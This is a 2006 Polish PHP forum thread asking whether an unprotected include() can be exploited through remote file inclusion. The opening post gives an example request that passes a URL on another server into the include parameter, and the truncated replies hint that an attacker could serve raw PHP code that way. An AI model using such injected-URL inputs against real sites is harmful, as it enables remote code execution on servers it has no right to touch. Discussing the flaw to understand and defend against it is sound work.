 Zagrożenie przy Includowanie pliku z innegoServera |
| Zagrożenie przy Includowanie pliku z innegoServera |
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 181 Pomógł: 0 Dołączył: 12.11.2005 Ostrzeżenie: (0%) 
 |
Hi.
W manualu php jest napisane o include: "(..)Ściśle mówiąc, nie jest to to samo, co wczytywanie pliku lokalnego; jest to wykonanie pliku na zdalnym serwerze i wklejenie rezultatu jego działania do skryptu wywołującego. W tym przypadku, rzecz jasna, zasięg globalny zmiennych nie obejmuje pliku wczytywanego tą metodą." Czyli defakto nie jest możliwy atak na niezabezpieczony include podająć adres URL do pliku .php na innym serverze (IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif) przykładowo gdzie include($tytul) : http://xxxxx.pl/?tytul=http://123.123.123.123/index.php Pozdro. |
 |
 
|
LBO polecam dogłębną lekturę tego tematu - jest tam mi... 17.04.2006, 09:52:45 maverickkk LBO -> Przeglądałem podany temat ale teraz zrob... 17.04.2006, 10:20:55 LBO a co jeżeli haker wyłączy obsługę php na swoim ser... 17.04.2006, 10:27:13 
maverickkk I to jest dobre pytanie.
Sprawdziłem jeśli plik j... 17.04.2006, 10:31:04   |
|
Aktualny czas: 3.10.2025 - 19:57 |
